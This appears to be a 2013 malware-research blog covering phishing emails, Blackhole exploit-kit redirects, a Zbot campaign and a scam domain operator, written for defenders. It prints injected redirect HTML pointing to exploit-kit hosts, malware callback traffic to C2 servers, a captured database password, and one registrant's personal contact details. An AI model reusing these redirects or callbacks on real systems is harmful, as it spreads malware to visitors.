Wednesday, June 19, 2013

Hotel Registration Phishing Campaign with AutoClerk(?)

This particular campaign is using the "shock and awe" billing technique to create urgency. This campaign is using predictable Blackhole techniques.
Also spotted on DSL Reports


Subject:   Your reservation at HOTEL UNION SQUARE
From:   "Reservations" <reservations@m.personalityhotelsmail.net>
Date:   Wed, June 19, 2013 12:39 pm
Priority:   Normal

Header information:
X-Mailer: AutoClerk <--- Whoa. Stop.
Let's dive
http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services
Autoclerk is a property management system that provides eMarketing to Hotels.
http://www.autoclerk.com/hotel-emarketing

^^

Content-Type: multipart/alternative; <-- Plain text and html elements k.
X-Spam-Status: No, score=5.8 <--- Not close enough.



Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.






The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.

(html>(CR)(LF)
(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)
(script·type="text/javascript">(CR)(LF)
(!--(CR)(LF)
location.replace("http://winne2000.net/news/enough-advise.php");(CR)(LF)
//-->(CR)(LF)
(/script>(CR)(LF)
(noscript>(CR)(LF)
(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php">(CR)(LF)
(/noscript>(CR)(LF)
(CR)(LF)
(/head>(CR)(LF)
(CR)(LF)
(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)
(CR)(LF)
(CR)(LF)
(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)
(CR)(LF)
(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)
(CR)(LF)
(h3>Redirecting·to·Complain·details...·Please·wait...(/h3>(CR)(LF)

And the payload begins us with 

<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{caewbtew=~312;}catch(vava){az=0;}

Let's go deeper


The caewbtew=~ string at the entry point is consistent with FedEx, American Airlines, DHL, and paypal with some obfuscation techniques that follow. Oh yes, also the BBB Campaign I looked at here. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.

This string has also been spotted in other compromised wordpress sites, about 860 indexed in google.


Which also contained the string:
Redirecting to Complain details... Please wait...

Something like 860 hits. Same as the BBB Campaign

Proving once again that nothing beats a human security analyst:


I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.



References:

Friday, June 7, 2013

BBB Phish Event - Blackhole - ZeroAccess

EMAIL

The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.

We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.

We are looking forward to your prompt response.

Best regardsTristan LewisDispute CouncilorBetter Business Bureau

==============HTML====================

GET /bbb.html HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Accept-Encoding:              Host: speedgarage.com.uaConnection: Keep-Alive

HTTP/1.0 200 OK

Server: nginx/1.1.10

Date: Fri, 07 Jun 2013 17:13:03 GMT

Content-Type: text/html

Content-Length: 738

Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT

Accept-Ranges: bytes


Connection: keep-alive


(html>

(title>BBB is loading...(/title>

(script type="text/javascript">

(!--location.replace("http://pnpnews.net/news/readers-sections.php");

//-->


(/script>


(noscript>

(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">

(/noscript>

(/head>

(h1>You will be redirected to process(/h1>

(h3>Redirecting to Complain details... Please wait...(/h3>

location.replace("http://pnpnews.net/news/readers-sections.php");

"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php




Payload: pnpnews.net

Exploit Kit: Blackhole

Snort Rules 

ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup
ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs
ET INFO Packed Executable Download
ET CURRENT_EVENTS Blackhole request for Payload
ET CURRENT_EVENTS BlackHole EK JNLP request
ET CURRENT_EVENTS - Possible BlackHole request with decryption Base
ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK
ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS
ET TROJAN Fareit/Pony Downloader Checkin 2
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)

Drop Points: 
88.191.130.98:8080

  • 8080/tcp open  http    nginx 1.0.10
  • 21/tcp   open     ftp          Pure-FTPd
  • 22/tcp   open     ssh          OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
  • 25/tcp   open     smtp         Postfix smtpd
  • 80/tcp   open     http         Apache httpd 2.2.14 ((Ubuntu))
  • 8080/tcp open     http         nginx 1.0.10
  • 8090/tcp open     http         nginx 1.2.6

213.214.74.5:8080 

  • 8080/tcp open  http         nginx 1.0.10
  • 21/tcp   open     ftp          ProFTPD 1.3.3d
  • 22/tcp   open     ssh          OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)
  • 80/tcp   open     http         Apache httpd 2.2.17 ((Ubuntu))


      Disk Artifacts of Interest: 

      exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47
      exp1.tmp
      exp2.tmp


      URLs Involved
      hxxp://carpenterpricebreaker.com/bbb.html
      hxxp://ecotopia.pl/bbb.html
      hxxp://gite-cantal-meandres.fr/bbb.html
      hxxp://ib-greb.de/bbb.html
      hxxp://intelaboratory.com/bbb.html
      hxxp://rentbaku.com/bbb.html
      hxxp://slavamoskovkin.ru/bbb.html
      hxxp://speedgarage.com.ua/bbb.html
      hxxp://vmoskalev.ru/bbb.html



      Sunday, April 28, 2013

      Let's Deep Dive a Domain Registration Scam Email

      Having an internet presence for so long, I have seen many of these.

      These emails are using the BMX Mailer, with a Precedence field, online virtual fax numbers and has some ties to a Romanian web server. The goal is to switch you to their "domain registration" service for an affordable $75/year lol.

      You only have to fax them a credit card form.

      Here's a copy of the email:


      Sent from a hotmail address, so clearly legitimate


      It is important to note that the message guarantees 100% satisfaction.




      So this hostname, email2u.us comes back to a Romanian registration. Probably nothing suspicious here #scoff




      Return-path: <domainservicb73@hotmail.com>
      Envelope-to: receiver@domain.com
      Delivery-date: Sat, 27 Apr 2013 18:54:15 -0500
      Received: from [184.82.95.130] (port=41871 helo=host.kevinz.com)
           by hosteddomain.com with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)
           (Exim 4.80)
           (envelope-from <domainservicb73@hotmail.com>)
           id 1UWEwY-0001rX-K2
           for receiver@domain.com; Sat, 27 Apr 2013 18:54:15 -0500
      Received: from domainin by host.kevinz.com with local (Exim 4.80)
           (envelope-from <domainservicb73@hotmail.com>)
           id 1UWEwN-000189-VO
           for receiver@domain.com; Sat, 27 Apr 2013 19:54:04 -0400
      To: receiver@domain.com
      Subject: Domain Notification: JOE CITIZEN This is your Final Notice of Domain Listing - domain.com

      X-PHP-Script: 184.82.95.130/~domainin/info/mail_new2.php for 99.247.101.189 

      (the php script seems to be common in these messages and the 99. address is a Canadia address)

      From: Domain Services <domainservicb73@hotmail.com>
      MIME-Version: 1.0
      Content-Type: text/html;

      X-Mailer: AT (undocumented X-mailer, seems to be a common string in these messages, see References)

      Priority: High
      Importance: High

      Precedence: VBBV (not generally used, see This and RFC 2076 - The Precedence in these messages appears always to be a 4 Letter Upper Case Code - might be good intelligence spam blockers to check for)

      Message-Id: <E1UWEwN-000189-VO@host.kevinz.com>
      Date: Sat, 27 Apr 2013 19:54:03 -0400
      X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
      X-AntiAbuse: Primary Hostname - host.kevinz.com
      X-AntiAbuse: Original Domain - domain.com
      X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]
      X-AntiAbuse: Sender Address Domain - hotmail.com
      X-Get-Message-Sender-Via: host.kevinz.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed
      X-Spam-Status: No, score=5.2
      X-Spam-Score: 52
      X-Spam-Bar: +++++
      X-Spam-Flag: NO


      Common Strings:


      • X-Mailer: AT
      • Precendence: (followed by a 4 Upper Case Letter Code)
      • /~domainin/info/mail_new2.php for <ip address>

      Some digging around revealed some leaked information on the server, which is publicly accessible. This is a list of the "csv" files which have been uploaded to the server.


      Information Leakage in HTML Files:


      A host of csv files are leaked and identified on this server, including the following:


      30mil_com-6-23.csv   
      30mil_com-6-24.csv   
      30mil_com-6-25.csv   
      30mil_com-6-26.csv   
      30mil_com-6-27.csv   
      30mil_com-6-28.csv   
      30mil_com-6-29.csv   
      30mil_com-6-30.csv   
      30mil_com-6-31.csv   
      30mil_com-6-32.csv   
      30mil_com-6-33.csv
      
      
      
      
      and there are a bunch more files like this. Nothing beats having 30 million+ emails to choose from.

      184.82.95.130 Services

      PORT     STATE  SERVICE VERSION
      53/tcp   open   domain  ISC BIND 9.3.6-20.P1.el5_8.6
      1723/tcp closed pptp
      Device type: general purpose|firewall|proxy server|WAP


      FYI: http://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-21860/ISC-Bind-9.3.0.html

      Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 184.82.95.130 Port 80


      Information Leakage in Error Message:

      [LF]
      <h1>404 Not Found</h1>[LF]
      
          Please forward this error screen to 184.82.95.130's [LF]
          <a href="mailto:kevinz50@ymail.com
          WebMaster</a>.[LF]
      </p>[LF]


      Centralops on email2u.us


      Domain Name:                                 EMAIL2U.US
      Domain ID:                                   D35316435-US
      Sponsoring Registrar:                        ENOM, INC.
      Sponsoring Registrar IANA ID:                48
      Registrar URL (registration services):       whois.enom.com
      Domain Status:                               clientTransferProhibited
      Registrant ID:                               62EA327952C1BCAB
      Registrant Name:                             Andrei  Manoliu
      Registrant Address1:                         atelierele noi
      Registrant City:                             bucharest
      Registrant State/Province:                   bucuresti
      Registrant Postal Code:                      014571
      Registrant Country:                          Romania
      Registrant Country Code:                     RO
      Registrant Phone Number:                     +40.767801428
      Registrant Email:                            slabeste2011@yahoo.com
      Registrant Application Purpose:              P1
      Registrant Nexus Category:                   C12
      Administrative Contact ID:                   EDAECA2EE634C95B
      Administrative Contact Name:                 Andrei  Manoliu
      Administrative Contact Address1:             atelierele noi
      Administrative Contact City:                 bucharest
      Administrative Contact State/Province:       bucuresti
      Administrative Contact Postal Code:          014571
      Administrative Contact Country:              Romania
      Administrative Contact Country Code:         RO
      Administrative Contact Phone Number:         +40.767801428
      Administrative Contact Email:                slabeste2011@yahoo.com


      BMX Mailer



      <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">[CRLF]
      [CRLF]
      <html>[CRLF]
      <head>[CRLF]
      <title>BMX : Bulk Mailer</title>[CRLF]
      </head>[CRLF]
      [CRLF]
      <body>[CRLF]
      [CRLF]
      <form name="mail" method="post" action="mail_new2.php">[CRLF]
      [CRLF]
        <table width="60%" border="0" cellspacing="1" cellpadding="1" align="center" bgcolor=#DCDCDC>[CRLF]
      <tr><td colspan=2><font face=arial size=2><strong>Bulk Mailer</strong></font></td></tr>[CRLF]
          <tr> [CRLF]
            <td align="right"><font face="Arial, Helvetica, sans-serif" size="2">Subject:</font></td>[CRLF]
            <td> [CRLF]
              <select size="1" name="subjectid" style="width:250">[CRLF]
      <option value="">-- Select -- [CRLF]
      <option value=1>Domain Notification: {NAME} This is your Final Notice of Domain Listing - {WEBURL}</select>[CRLF]
            </td>[CRLF]
          </tr>[CRLF]
      <tr>[CRLF]
      <td align=right><font face=arial size=2>Select Group:</font></td>[CRLF]
      <td>[CRLF]
      <select name="groupid">[CRLF]
      <option value=0>-- Select --[CRLF]
      <option value=1>Domain Services</select>[CRLF]
      </td>[CRLF]

      Others have gotten this and posted their headers. 



      From - Fri Mar 22 17:28:39 2013
      X-Account-Key: account2
      X-UIDL: 12219
      X-Mozilla-Status: 0001
      X-Mozilla-Status2: 00010000
      X-Mozilla-Keys:
      Return-Path: domainserhhjcb73@hotmail.com
      Received: from spoolbl10-d.mail.gandi.net ([217.70.178.90])
      by mail.brakstar.com
      ; Fri, 22 Mar 2013 17:24:00 +0100
      Received: from mxcontact.gandi.net (mxcontact.gandi.net [217.70.177.36])
      by spoolbl10-d.mail.gandi.net (Postfix) with ESMTP id 0D8E795AE38
      for <societe@brakstar.com>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)
      Received: from server1.ryansheppard.com (unknown [209.198.1.90])
      by mredir1-v.mgt.gandi.net (Postfix) with ESMTP id 4544EEC40A
      for <8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)
      Received: from domainin by server1.ryansheppard.com with local (Exim 4.80)
      (envelope-from <domainserhhjcb73@hotmail.com>)
      id 1UIy2y-00032y-JH
      for 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET; Fri, 22 Mar 2013 05:14:00 -0400
      To: 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET
      Subject: Domain Notification: SARL BRAKSTAR This is your Final Notice of Domain Listing - RATONIA.COM

      X-PHP-Script: 209.198.1.90/~domainin/info/mail_new2.php for 99.237.121.36 (Again Canadian IP Address)

      From: Domain Services <domainserhhjcb73@hotmail.com>
      MIME-Version: 1.0
      Content-Type: text/html;

      X-Mailer: AT

      Priority: High
      Importance: High

      Precedence: SSWD

      Message-Id: <E1UIy2y-00032y-JH@server1.ryansheppard.com>
      Date: Fri, 22 Mar 2013 05:14:00 -0400
      X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
      X-AntiAbuse: Primary Hostname - server1.ryansheppard.com
      X-AntiAbuse: Original Domain - contact.gandi.net
      X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]
      X-AntiAbuse: Sender Address Domain - hotmail.com
      X-Get-Message-Sender-Via: server1.ryansheppard.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed
      X-Antivirus: avast! (VPS 130322-0, 22/03/2013), Inbound message
      X-Antivir



      References:
      http://www.spamreg.com/reg495597.htm
      http://www.ip-adress.com/whois/kevinz.com
      http://www.holmpage.com/2011/10/spam-alert-domain-notification-this-is-your-final-notice-of-domain-listing/
      http://www.webx.net/bmx/
      http://www.brakstar.com/forum/braktopic_22844.html
      http://www.elvey.com/spam/Domain_Services.html

      Sunday, April 21, 2013

      FTP JPG EXE as a Second Stage

      Something somewhat interesting. Blackhole exploit at


       GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:
      1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
      User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
      Host: jindalo.ru:8080
      Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
      Connection: keep-alive
      
      
      
      
      SHA256:5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257
      File name:blackhole.exe
      Detection ratio:1 / 46
      Analysis date:2013-04-21 21:37:27 UTC ( 0 minutes ago )
      https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/
      
      
      Ok, nothing new here. Whatever. Thanks for exploiting my Java. Strings is all garbage, Peid balked.
      
      
      1,400+ UDP 16471 ala ZeroAccess in like 20 minutes and an interesting one on 55755.
      
      
      
      
       GET /app/geoip.js HTTP/1.0
      Host: j.maxmind.com
      Connection: close
      
      
      Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?
      
      
      __________________________________________
      
      
      POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
      Host: 88.191.130.98:8080
      Content-Length: 339
      Connection: Keep-Alive
      Cache-Control: no-cache
      
      
      
      IP Seen on URL Query: http://urlquery.net/report.php?id=1768644
      
      
      __________________________________________
      
      
      POST /asp/intro.php HTTP/1.0
      Host: 111.68.142.223
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Content-Length: 269
      Connection: close
      Content-Type: application/octet-stream
      Content-Encoding: binary
      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
      
      
      User agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html
      
      
      Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid url following this.
      __________________________________________
      
      
      This one looks interesting. Using Bit.ly, but a 301 to google put the kabash on this one. 
      
      
      POST /YddCcn? HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 121
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
      Host: bit.ly
      Connection: Keep-Alive
      
      op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=
      turckatty_2&DatabaseBD=turckatty_2&sgdb=
      
      
      Well the user agent is known badness: here and here dating back to 2010.
      
      
      
      
       GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ
      0s7u HTTP/1.0
      Host: xlotxdxtorwfmvuzfuvtspel.com
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
      Accept-Language: en-us
      Connection: close
      
      
      I surmise this is a check in because I get a 200 OK but the content is empty - just a speculation.  Site Sinkholed.
      
      
      
      
      Ok, now for some FTP. The malware calls out to FTP server with user name and password in clear text (most appreciated).
      
      
      220 Microsoft FTP Service
      
      USER <redacted>
      
      331 Password required for <redacted>.
       
      PASS <redacted>
      
      230 User logged in.
      
      215 Windows_NT
      
      CWD /dados/maxo4/
      
      250 CWD command successful.
       
      PASV
      227 Entering Passive Mode (<redacted>).
      RETR E174D3044694.jpg
      
      550 The system cannot find the file specified. 
      
      This thing tried multiple jpg files, none of which could be found.
      Well, I'm not going to let that one go by.
      Peaked my interest. I go digging and I find a root directory


      
      
      
      
      
      
      
      
      
      
      Interesting, so I download the jpgs that are there. 
      
      
      
      
      
      
      
      
      The worm is a variant on DelfInject.
      
      
      MZP   ÿÿ¸@  º   ´ Í!¸ LÍ!This program must be run under Win32 $
      
      
      
      
      Dumping the strings:
      
      
      DVCLAL
      PACKAGEINFO
      PORCOS
      TDTCONFIG
      TFORM1
      TFRMDATETIME
      xn7
      CPlApplet
      kernel32.dll
      LoadLibraryA
      GetProcAddress
      VirtualAlloc
      VirtualFree
      oleaut32.dll
      SysFreeString
      advapi32.dll
      RegQueryValueExW
      user32.dll
      LoadStringW
      msimg32.dll
      AlphaBlend
      gdi32.dll
      UnrealizeObject
      version.dll
      VerQueryValueW
      ole32.dll
      OleUninitialize
      comctl32.dll
      InitializeFlatSB
      winspool.drv
      OpenPrinterW
      ntdll
      NtUnmapViewOfSection
      
      
      Interesting DNS Traffic to a Sprint Wireless Address, no further traffic on this one. Pwned mobile? (Guessing)
      
      
      00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]
      00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]
      
      
      
      173.4.250.10
      88.191.130.98:8080
      jindalo.ru:8080
      111.68.142.223
      
      
      
      
      Additional References:
      http://labs.snort.org/iplists/urllist-2012-07-01
      http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/
      http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI
      
      

      Tuesday, March 26, 2013

      Fake FedEx Phishing Zbot


      URL Query Examples:
      http://urlquery.net/search.php?q=fedex_trk&type=string&start=2013-03-11&end=2013-03-26&max=50


      2013-03-26 16:38:29
      0 / 0http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip208.109.227.206

      2013-03-26 10:18:09
      0 / 1http://ilconline.org/images/fedex_trk_61293150511865307217.zip208.109.138.8

      2013-03-25 17:26:17
      0 / 1http://ilconline.org/images/fedex_trk_61293150511865307217.zip208.109.138.8

      2013-03-25 15:32:11
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 15:26:38
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 15:21:55
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 15:18:27
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 15:12:23
      0 / 0http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 15:10:29
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 15:01:10
      0 / 0http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 14:59:39
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      2013-03-25 14:47:02
      0 / 1http://jimperona.com/plugins/fedex_trk_61293150511865307217.zip72.167.183.50

      Got get it

      Offending Host:
      178.175.139.47 Taken down
      213.57.77.220  Taken down
      hotels2013.org
      adverts2013.org
      yamaha-motor2013.com

      UPDATE: Callback:
      Date (CET)Alerts / IDSURLIP

      2013-03-31 11:57:12
      0 / 1http://adverts2013.com/pmserver/get.php213.57.77.220

      2013-03-30 19:26:22
      0 / 1http://geographic-channel.com/pmserver/browse.php213.57.77.220

      2013-03-30 19:26:09
      0 / 1http://geographic-channel.com/pmserver/browse.php213.57.77.220

      2013-03-30 19:22:41
      0 / 1http://hotels2013.org/pmserver/browse.php213.57.77.220

      2013-03-30 19:22:38
      0 / 1http://hotels2013.org/pmserver/browse.php213.57.77.220

      2013-03-29 17:55:07
      0 / 1http://printing-offices.com/pmserver/backget.php213.57.77.220

      2013-03-28 14:14:10
      0 / 0http://geographic-channel.com/pmserver/browse.php213.57.77.220

      2013-03-28 08:12:55
      0 / 0http://hotels2013.org/pmserver/browse.php213.57.77.220

      2013-03-27 17:57:39
      0 / 0http://adverts2013.com/pmserver/get.php213.57.77.220

      2013-03-27 16:48:43
      0 / 0http://hotels2013.org/pmserver/browse.php213.57.77.220

      2013-03-27 16:45:52
      0 / 0http://adverts2013.com/pmserver/get.php213.57.77.220

      2013-03-27 14:31:09
      0 / 0http://powersock2014.com/pmserver/file.php213.57.77.220

      2013-03-27 14:22:58
      0 / 0http://printing-offices.com/pmserver/get.php213.57.77.220

      2013-03-27 14:18:14
      0 / 0http://printing-offices.com/pmserver/backget.php213.57.77.220

      2013-03-27 13:59:13
      0 / 0http://hotels2013.org/pmserver/browse.php213.57.77.220

      2013-03-27 07:49:40
      0 / 0http://adverts2013.com/pmserver/get.php213.57.77.220

      2013-03-27 04:33:37
      0 / 0http://adverts2013.com/pmserver/get.php213.57.77.220


      PORT    STATE    SERVICE      VERSION
      22/tcp  open     ssh          OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
      80/tcp  open     http         nginx 1.2.7



      inetnum:        178.175.139.32 - 178.175.139.63
      netname:        VPSCORNER-NET
      descr:          VPSCorner
      country:        MD
      admin-c:        CC11822-RIPE
      tech-c:         CC11822-RIPE
      status:         ASSIGNED PA
      mnt-by:         TRABIA-MNT
      changed:        noc@trabia.net 20130318
      source:         RIPE


      Submitted.

      Web Traffic:

      POST /pmserver/browse.php HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Host: hotels2013.org
      Content-Length: 119
      Connection: Keep-Alive
      Cache-Control: no-cache


      HTTP/1.1 200 OK
      Server: nginx/1.2.7
      Date: Tue, 26 Mar 2013 13:29:45 GMT
      Content-Type: application/octet-stream
      Content-Length: 26704
      Connection: keep-alive
      X-Powered-By: PHP/5.3.23-1~dotdeb.0
      Cache-Control: public
      Content-Disposition: attachment; filename="%2e/files/ftc.jpg"
      Content-Transfer-Encoding: binary





      POST /pmserver/get.php HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Host: adverts2013.com
      Content-Length: 380
      Connection: Keep-Alive
      Cache-Control: no-cache



      HTTP/1.1 200 OK
      Server: nginx/1.2.7
      Date: Tue, 26 Mar 2013 13:30:16 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive





      POST /pmserver/get.php HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Host: adverts2013.com
      Content-Length: 253
      Connection: Keep-Alive
      Cache-Control: no-cache


      HTTP/1.1 200 OK
      Server: nginx/1.2.7
      Date: Tue, 26 Mar 2013 13:30:29 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.23-1~dotdeb.0






      VT
      SHA256:98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8
      File name:pon.exe
      Detection ratio:4 / 45
      Analysis date:2013-03-26 16:12:47 UTC ( 1 minute ago )


      https://www.virustotal.com/en/file/98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8/analysis/1364314367/


      SHA256:
      fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc
      File name:fedex_trk_61293150511865307217.scr
      Detection ratio:8 / 46
      Analysis date:2013-03-26 01:49:15 UTC ( 14 hours, 3 minutes ago )

      https://www.virustotal.com/en/file/fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc/analysis/



      SHA256:f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154
      File name:alfasp1alfa3.exe
      Detection ratio:6 / 44
      Analysis date:2013-03-26 16:08:45 UTC ( 1 minute ago )

      https://www.virustotal.com/en/file/f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154/analysis/1364314125/